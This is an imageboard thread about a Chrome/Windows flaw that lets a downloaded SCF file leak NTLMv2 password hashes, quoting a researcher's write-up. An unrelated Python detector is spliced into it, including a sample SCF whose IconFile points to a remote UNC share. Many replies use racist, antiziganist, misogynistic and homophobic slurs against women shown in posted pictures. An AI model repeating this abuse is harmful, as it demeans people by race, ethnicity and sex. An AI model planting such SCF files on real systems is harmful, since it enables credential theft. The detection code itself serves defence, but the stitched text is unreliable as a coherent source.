Discovered by DefenseCode security researcher Bosko Stankovic (via ZDNet), the flaw works through a clever trick in the way Chrome and Windows both treat Windows Explorer Shell Command File (SCF) files, which are used as a Show Desktop icon shortcut. The end result is that the SCF file can be used to obtain a user's LAN Manager (NTLMv2) password hash.
>Chrome users can protect themselves by disabling automatic downloads. This can be done in Settings, and selecting Show advanced settings, followed by checking the option to 'Ask where to save each file before downloading'.
Yawwwwwwwwwn
Joseph Young
>load up bugzilla
>over 100 pages of critical security issues
niiiice
Aaron Miller
>Windows
Cameron Davis
Not this thread again...
Bentley Green
>Another
>it's the same as posted yesterday
ḧmmm
Asher Carter
>Ungoogled Chromium
>Windows 7
>Encrypted
I think I'm safe senpai-desu
Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead. We tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous.
All tested solutions failed to flag it as anything suspicious, which we hope will change soon. SCF file analysis would be easy to implement as it only requires inspection of the IconFile parameter, considering there are no legitimate uses of SCF with remote icon locations.
Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse the victim's authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such a vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources.
We hope that the Google Chrome browser will be updated to address this flaw in the near future.
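The check described in the quoted write-up above (inspect the IconFile parameter of an SCF file and flag remote icon locations), as an added example that is not part of the thread or of the DefenseCode write-up. It assumes SCF files are INI-style text with an `IconFile=` key; the function names are hypothetical and the sample file contents, including the documentation-range address, are constructed.

```python
import re

# Match "IconFile = value" in any section, any letter case.
ICONFILE = re.compile(r'^\s*IconFile\s*=\s*(.*?)\s*$', re.IGNORECASE)

# Remote location: UNC path (\\host\share or //host/share), the long-path
# UNC form (\\?\UNC\host\share), or a URL scheme such as file:// or http://.
REMOTE = re.compile(
    r'^(?:[\\/]{2}[^\\/?.]|[\\/]{2}[?.][\\/]UNC[\\/]|[a-z][a-z0-9+.-]+://)',
    re.IGNORECASE,
)

def decode_scf(data):
    """Decode raw SCF bytes, honouring a UTF-16 or UTF-8 byte-order mark."""
    if data.startswith((b'\xff\xfe', b'\xfe\xff')):
        return data.decode('utf-16', errors='replace')
    return data.decode('utf-8-sig', errors='replace')

def remote_icon_locations(data):
    """Return every IconFile value that points at a remote location.

    Lines are scanned directly instead of using an INI parser, so a
    malformed file cannot make the scanner give up before it reaches
    the IconFile line.
    """
    hits = []
    for line in decode_scf(data).splitlines():
        match = ICONFILE.match(line)
        if not match:
            continue
        value = match.group(1).strip('"')
        if REMOTE.match(value):
            hits.append(value)
    return hits

# Constructed samples: one remote icon location, one local icon resource.
SAMPLE_REMOTE = (b"[Shell]\r\nCommand=2\r\n"
                 b"IconFile=\\\\192.0.2.10\\share\\icon.ico\r\n"
                 b"[Taskbar]\r\nCommand=ToggleDesktop\r\n")
SAMPLE_LOCAL = (b"[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
                b"[Taskbar]\r\nCommand=ToggleDesktop\r\n")

if __name__ == "__main__":
    for name, blob in (("remote", SAMPLE_REMOTE), ("local", SAMPLE_LOCAL)):
        print(name, remote_icon_locations(blob) or "clean")
```

A download filter or mail gateway could call `remote_icon_locations` on any file with an `.scf` extension and quarantine it when the list is non-empty.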
Jeremiah Johnson
You're not safe
Jaxon Bell
He is since Chromium doesn't have auto-updates, you are not capable of reading the article, and you don't know Chromium's nuances.
Jack Walker
You don't need updates for this to work, it just requires visiting a site. If you're on Chromium you're even further behind in security.
Hudson Evans
As I've said, you are incapable of reading English and the article. The first user in this thread is though.
Grayson Sanchez
>Windows 10
HA
Robert Ross
The Apple MacBook Pro with Retina Display doesn't have this problem.
Leo Reed
wtf is wrong with her feet? o_O god fucking damn it, nigger genetics are complete shit
Charles Gomez
>proceeds to post a hair dyed gypsie whore
Noah Gutierrez
stop posting orangutans on my board
Eli Morales
what kind of mystery meat is that?
Adrian Cook
tanya :3
Brody Butler
check the latest build of chromium and the latest autoupdated version of chrome idiot. chrome is far behind chromium.
Jason Myers
WHO IS THIS SEMEN DEMON
Christian Campbell
Kek
Owen Perez
no one posted trump
Charles Adams
...
Ayden Peterson
>posting a dyed hair brown eyed Ukrainian gypsy whore who's parents sold her into sex slavery when she was a child
Parker Jackson
SAUCE
Xavier Mitchell
...
Luke Myers
I didn't ask you, you 12yo edgelord.
Jaxson Gray
>Guy finds exploit
>Google will fix with an update
>Chrome now has 1 less exploit
Wouldn't it be better to use Chrome after this?
Aaron Bennett
Is there anything in this world that's not a complete piece of shit security wise?
Luis Miller
no, read vault7
Josiah Collins
>being this ass blasted
Camden Evans
SAUCE ME UP
Tyler Collins
...
Zachary Phillips
>he thinks he can troll people with something like this
are you from reddit?
Grayson Moore
>"There is no need to click or open the downloaded file -- Windows File Explorer will automatically try to retrieve the 'icon'," notes Stankovic.
Well, shit
Angel Clark
nobody asked you to link sheboons there bud. here is a picture of a human being with a developed neo cortex. faggot.
Wyatt Ward
what if you use 3rd party thumbnail generators? I do.
Camden Murphy
I help you, friend. I not troll :) You asked for brown persons, I gave you. Enjoy.